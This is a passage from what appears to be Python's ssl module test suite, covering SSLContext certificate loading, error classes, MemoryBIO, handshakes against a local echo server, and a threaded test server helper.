self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
@unittest.skipUnless(_have_threads, "Needs threading module")
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SIGNING_CA)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'localhost')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
if _have_threads:
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
